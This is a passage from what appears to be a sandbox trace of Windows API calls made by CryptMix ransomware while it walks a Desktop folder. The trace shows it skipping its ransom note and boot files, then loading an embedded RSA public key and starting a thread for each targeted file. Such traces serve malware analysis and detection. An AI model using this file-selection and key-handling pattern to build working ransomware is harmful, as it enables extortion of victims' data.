y0s0iE3pixbWf.mp4" [0165.944] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0165.944] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1ac [0165.945] Sleep (dwMilliseconds=0x96) [0166.161] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0166.161] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2="..") returned 1 [0166.161] lstrcmpW (lpString1="qWhs9jNagvnL0I2S.avi", lpString2=".") returned 1 [0166.161] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0166.161] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntldr") returned 0x0 [0166.161] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTLDR") returned 0x0 [0166.161] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="NTDETECT.COM") returned 0x0 [0166.161] StrStrW (lpFirst="qWhs9jNagvnL0I2S.avi", lpSrch="ntdetect.com") returned 0x0 [0166.161] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0166.161] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0166.162] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.162] lstrcpyW (in: lpString1=0x17cf1c, lpString2="qWhs9jNagvnL0I2S.avi" | out: lpString1="qWhs9jNagvnL0I2S.avi") returned="qWhs9jNagvnL0I2S.avi" [0166.162] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x978 [0166.162] Sleep (dwMilliseconds=0x96) [0166.442] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0166.442] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2="..") returned 1 [0166.442] lstrcmpW (lpString1="R29FEAYxqzGKfm4iuq.wav", lpString2=".") returned 1 [0166.442] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0166.442] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntldr") returned 0x0 [0166.442] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTLDR") returned 0x0 [0166.442] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="NTDETECT.COM") returned 0x0 [0166.442] StrStrW (lpFirst="R29FEAYxqzGKfm4iuq.wav", lpSrch="ntdetect.com") returned 0x0 [0166.442] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0166.442] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0166.442] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.442] lstrcpyW (in: lpString1=0x17cf1c, lpString2="R29FEAYxqzGKfm4iuq.wav" | out: lpString1="R29FEAYxqzGKfm4iuq.wav") returned="R29FEAYxqzGKfm4iuq.wav" [0166.442] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x980 [0166.443] Sleep (dwMilliseconds=0x96) [0166.613] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0166.613] lstrcmpW (lpString1="RcaCR.avi", lpString2="..") returned 1 [0166.613] lstrcmpW (lpString1="RcaCR.avi", lpString2=".") returned 1 [0166.613] StrStrW (lpFirst="RcaCR.avi", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0166.613] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntldr") returned 0x0 [0166.613] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTLDR") returned 0x0 [0166.613] StrStrW (lpFirst="RcaCR.avi", lpSrch="NTDETECT.COM") returned 0x0 [0166.613] StrStrW (lpFirst="RcaCR.avi", lpSrch="ntdetect.com") returned 0x0 [0166.613] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0166.613] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0166.614] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.614] lstrcpyW (in: lpString1=0x17cf1c, lpString2="RcaCR.avi" | out: lpString1="RcaCR.avi") returned="RcaCR.avi" [0166.614] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x974 [0166.614] Sleep (dwMilliseconds=0x96) [0166.771] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0166.771] lstrcmpW (lpString1="SdgI3.mp4", lpString2="..") returned 1 [0166.771] lstrcmpW (lpString1="SdgI3.mp4", lpString2=".") returned 1 [0166.771] StrStrW (lpFirst="SdgI3.mp4", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0166.771] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntldr") returned 0x0 [0166.772] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTLDR") returned 0x0 [0166.772] StrStrW (lpFirst="SdgI3.mp4", lpSrch="NTDETECT.COM") returned 0x0 [0166.772] StrStrW (lpFirst="SdgI3.mp4", lpSrch="ntdetect.com") returned 0x0 [0166.772] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0166.772] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0166.772] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.772] lstrcpyW (in: lpString1=0x17cf1c, lpString2="SdgI3.mp4" | out: lpString1="SdgI3.mp4") returned="SdgI3.mp4" [0166.772] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.772] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x968 [0166.772] Sleep (dwMilliseconds=0x96) [0166.925] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0166.925] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2="..") returned 1 [0166.925] lstrcmpW (lpString1="XaK4rq6FxAm.gif", lpString2=".") returned 1 [0166.925] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0166.925] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntldr") returned 0x0 [0166.925] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTLDR") returned 0x0 [0166.925] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="NTDETECT.COM") returned 0x0 [0166.925] StrStrW (lpFirst="XaK4rq6FxAm.gif", lpSrch="ntdetect.com") returned 0x0 [0166.925] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0166.925] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0166.926] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0166.926] lstrcpyW (in: lpString1=0x17cf1c, lpString2="XaK4rq6FxAm.gif" | out: lpString1="XaK4rq6FxAm.gif") returned="XaK4rq6FxAm.gif" [0166.926] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0166.926] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x98c [0166.926] Sleep (dwMilliseconds=0x96) [0167.081] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.081] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2="..") returned 1 [0167.081] lstrcmpW (lpString1="xzzx_cryptMix.vir.exe", lpString2=".") returned 1 [0167.081] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.081] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntldr") returned 0x0 [0167.081] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTLDR") returned 0x0 [0167.081] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="NTDETECT.COM") returned 0x0 [0167.081] StrStrW (lpFirst="xzzx_cryptMix.vir.exe", lpSrch="ntdetect.com") returned 0x0 [0167.081] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.081] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.082] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.082] lstrcpyW (in: lpString1=0x17cf1c, lpString2="xzzx_cryptMix.vir.exe" | out: lpString1="xzzx_cryptMix.vir.exe") returned="xzzx_cryptMix.vir.exe" [0167.082] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.082] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x988 [0167.082] Sleep (dwMilliseconds=0x96) [0167.237] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.237] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2="..") returned 1 [0167.237] lstrcmpW (lpString1="Ya6Z9poxN.swf", lpString2=".") returned 1 [0167.237] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.237] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntldr") returned 0x0 [0167.237] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTLDR") returned 0x0 [0167.237] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="NTDETECT.COM") returned 0x0 [0167.237] StrStrW (lpFirst="Ya6Z9poxN.swf", lpSrch="ntdetect.com") returned 0x0 [0167.237] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.237] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.238] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.238] lstrcpyW (in: lpString1=0x17cf1c, lpString2="Ya6Z9poxN.swf" | out: lpString1="Ya6Z9poxN.swf") returned="Ya6Z9poxN.swf" [0167.238] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.238] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x984 [0167.238] Sleep (dwMilliseconds=0x96) [0167.421] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.421] lstrcmpW (lpString1="ym0OWp.ods", lpString2="..") returned 1 [0167.421] lstrcmpW (lpString1="ym0OWp.ods", lpString2=".") returned 1 [0167.421] StrStrW (lpFirst="ym0OWp.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.421] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntldr") returned 0x0 [0167.421] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTLDR") returned 0x0 [0167.421] StrStrW (lpFirst="ym0OWp.ods", lpSrch="NTDETECT.COM") returned 0x0 [0167.421] StrStrW (lpFirst="ym0OWp.ods", lpSrch="ntdetect.com") returned 0x0 [0167.421] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.422] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.422] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0167.422] lstrcpyW (in: lpString1=0x17cf1c, lpString2="ym0OWp.ods" | out: lpString1="ym0OWp.ods") returned="ym0OWp.ods" [0167.422] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0167.422] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x990 [0167.422] Sleep (dwMilliseconds=0x96) [0167.565] FindNextFileW (in: hFindFile=0x4372438, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0167.565] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2="..") returned 1 [0167.565] lstrcmpW (lpString1="YmOf4LXrg2cAXUtOgh.m4a", lpString2=".") returned 1 [0167.565] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0167.565] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntldr") returned 0x0 [0167.565] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTLDR") returned 0x0 [0167.565] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="NTDETECT.COM") returned 0x0 [0167.565] StrStrW (lpFirst="YmOf4LXrg2cAXUtOgh.m4a", lpSrch="ntdetect.com") returned 0x0 [0167.565] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 42 [0167.565] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") [0167.565] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- 